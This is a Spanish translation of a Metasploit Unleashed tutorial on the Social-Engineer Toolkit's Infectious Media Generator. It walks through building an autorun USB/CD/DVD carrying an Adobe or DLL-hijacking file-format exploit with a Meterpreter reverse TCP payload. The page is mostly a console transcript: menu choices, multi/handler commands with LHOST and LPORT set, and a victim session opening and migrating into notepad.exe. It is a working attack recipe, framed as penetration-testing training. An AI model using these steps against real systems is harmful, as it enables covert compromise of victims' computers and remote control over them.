Generador de Medios Infecciosos
De www.metasploit-es.com.ar
Generador de Medios Infecciosos
Moviendonos en los vectores de ataque fisicos, y un metodo de ataque completamente diferente, utilizaremos el vector de ataque USB/DVD/CD Infeccioso. Este vector de ataque te permitira importar tu propio ejecutable malicioso, o uno incluido en Metasploit, para crear un DVD/CD/USB que incorpora un archivo autorun.inf. Una vez insertado el dispositivo, llamara autorun y se ejecutara el ejecutable. Como novedad en la version mas reciente, puede utilizar exploits de formato de archivo tambien, si te preocupa que un ejecutable pueda disparar alertas, puedes especificar un exploit de formato de archivo que disparara un overflow y comprometera el sistema (por ejemplo un exploit de Adobe).
Select from the menu:
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Third Party Modules
9. Update the Metasploit Framework
10. Update the Social-Engineer Toolkit
11. Help, Credits, and About
12. Exit the Social-Engineer Toolkit
Enter your choice: 3
The Infectious USB/CD/DVD method will create an autorun.inf file and a Metasploit
payload. When the DVD/USB/CD is inserted, it will automatically run if autorun
is enabled.
Pick what type of attack vector you want to use, fileformat bugs or a straight executable.
1. File-Format Exploits
2. Standard Metasploit Executable
Enter your numeric choice (return for default): 1
Enter the IP address for the reverse connection (payload): 172.16.32.129
Select the file format exploit you want.
The default is the PDF embedded EXE.
********** PAYLOADS **********
1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2. Adobe Flash Player 'Button' Remote Code Execution
3. Adobe CoolType SING Table 'uniqueName' Overflow
4. Adobe Flash Player 'newfunction' Invalid Pointer Use
5. Adobe Collab.collectEmailInfo Buffer Overflow
6. Adobe Collab.getIcon Buffer Overflow
7. Adobe JBIG2Decode Memory Corruption Exploit
8. Adobe PDF Embedded EXE Social Engineering
9. Adobe util.printf() Buffer Overflow
10. Custom EXE to VBA (sent via RAR) (RAR required)
11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
12. Adobe PDF Embedded EXE Social Engineering (NOJS)
Enter the number you want (press enter for default): 1
1. Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker.
2. Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6. Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system.
7. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
Enter the payload you want (press enter for default):
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 172.16.32.129:443
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/program_junk/template.pdf directory
[*] Payload generation complete. Press enter to continue.
[*] Your attack has been created in the SET home directory folder "autorun"
[*] Copy the contents of the folder to a CD/DVD/USB to autorun.
Do you want to create a listener right now yes or no: yes
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
resource (/pentest/exploits/set/src/program_junk/meta_config)> use multi/handler
resource (/pentest/exploits/set/src/program_junk/meta_config)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set lhost 172.16.32.129
lhost => 172.16.32.129
resource (/pentest/exploits/set/src/program_junk/meta_config)> set lport 443
lport => 443
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.32.129:443
[*] Starting the payload handler...
Al hacer un ls -al en el directorio de SET notaras que hay un directorio "autorun". Quema los contenidos de ese directorio a un CD/DVD o escribelos en un dispositivo USB. Una vez insertado, se te presentara una shell.
[*] Sending stage (748544 bytes) to 172.16.32.131 [*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:42:32 -0400 2010 [*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript 'migrate -f' [*] Current server process: java.exe (824) [*] Spawning a notepad.exe host process... [*] Migrating into process ID 3044 [*] New server process: notepad.exe (3044) msf exploit(ms09_002_memory_corruption) >
© Offensive Security 2009
Original de www.offensive-security.com Traducido por cbk999
